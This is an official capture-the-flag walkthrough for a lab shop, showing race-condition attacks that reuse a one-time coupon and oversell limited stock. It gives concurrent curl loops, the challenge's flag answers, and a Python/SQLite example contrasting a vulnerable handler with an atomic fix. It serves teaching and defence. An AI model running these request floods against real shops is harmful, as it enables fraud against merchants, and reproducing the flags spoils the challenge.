HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Crapazon — Race Conditions

Difficulty: Intermediate
Vuln class: Race Condition
Steps: 3
// Objective
Exploit race conditions to reuse a one-time coupon and to buy items beyond available stock.
// Tools required
Browser, Burp Suite Intruder, curl, ffuf
// Step-by-step walkthrough
1. Apply a coupon — once
Add an item to cart and apply the SAVE50 coupon. Note the discount applies correctly the first time.
2. Race the coupon endpoint (Flag 1)
Send 30 concurrent POST requests applying SAVE50 before the server marks it used. Use Burp's "Send group in parallel" feature, or curl with each request backgrounded using &.
Command / Input
for i in $(seq 30); do curl -s -X POST http://TARGET/api/cart/coupon -d '{"code":"SAVE50"}' & done
Output
Multiple responses: {"discount":50,"flag":"HackrGG{r4c3_c0nd1t10n_c0up0n_r3us3d}"}
The flag appears in responses where the coupon was applied multiple times before the lock kicked in.
3. Race the stock check (Flag 2)
Find an item with limited stock (1 unit). Send 30 concurrent buy requests before the stock decrements.
Command / Input
for i in $(seq 30); do curl -s -X POST http://TARGET/api/cart/buy -d '{"item":"laptop-pro"}' & done
Output
HackrGG{r4c3_c0nd1t10n_fr33_1t3m}
When stock goes negative you've triggered the race. The flag appears in the response.
// Flag
Flag value
HackrGG{r4c3_c0nd1t10n_c0up0n_r3us3d}
Flag 1 in the coupon race response; Flag 2 when stock goes negative.
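
// Server-side view (added example)
Both flags come from a check-then-act sequence on the server: the "is the coupon unused / is stock above zero" read and the write that follows are separate steps. The Python/SQLite code below is an added example, not code from the challenge or from hackr.gg; it shows the vulnerable pattern next to a fix that makes check and write one conditional UPDATE. The schema, the function names and the barrier used to make the race deterministic are assumptions.

```python
import os, sqlite3, tempfile, threading

N = 30  # same concurrency as the walkthrough's request loops
REDEEM = "UPDATE coupons SET used=1 WHERE code=? AND used=0"   # check + write in one statement
BUY = "UPDATE items SET stock=stock-1 WHERE sku=? AND stock>0"

def make_db():
    """Constructed sample data (hypothetical schema): one coupon, one item with stock 1."""
    path = os.path.join(tempfile.mkdtemp(), "shop.db")
    db = sqlite3.connect(path)
    db.executescript("""
        CREATE TABLE coupons(code TEXT PRIMARY KEY, used INTEGER NOT NULL);
        CREATE TABLE items(sku TEXT PRIMARY KEY, stock INTEGER NOT NULL CHECK(stock >= 0));
        INSERT INTO coupons VALUES('SAVE50', 0); INSERT INTO items VALUES('laptop-pro', 1);
    """)
    db.close()
    return path

def redeem_vulnerable(path, code, gate):
    """Check-then-act: the read and the write are separate statements."""
    db = sqlite3.connect(path, timeout=30, isolation_level=None)
    used = db.execute("SELECT used FROM coupons WHERE code=?", (code,)).fetchall()[0][0]
    gate.wait()  # test aid: every request has passed the check before any of them writes
    if not used:
        db.execute("UPDATE coupons SET used=1 WHERE code=?", (code,))
    db.close()
    return not used  # True means "discount granted"

def claim(path, sql, key):
    """Hardened: one conditional UPDATE; only the request that changed a row wins."""
    db = sqlite3.connect(path, timeout=30, isolation_level=None)
    won = db.execute(sql, (key,)).rowcount == 1
    db.close()
    return won

def race(fn, *args):
    """Call fn from N threads at once; return how many calls reported success."""
    results = []
    threads = [threading.Thread(target=lambda: results.append(fn(*args))) for _ in range(N)]
    for t in threads: t.start()
    for t in threads: t.join()
    return sum(results)

def demo():
    vulnerable = race(redeem_vulnerable, make_db(), "SAVE50", threading.Barrier(N))
    path = make_db()
    redeemed, sold = race(claim, path, REDEEM, "SAVE50"), race(claim, path, BUY, "laptop-pro")
    stock = sqlite3.connect(path).execute("SELECT stock FROM items").fetchone()[0]
    return vulnerable, redeemed, sold, stock
```

demo() returns the number of discounts granted by the vulnerable handler, then the number of redemptions and purchases granted by the atomic version, then the remaining stock. The CHECK(stock >= 0) constraint is a second line of defence should a handler ever skip the conditional UPDATE.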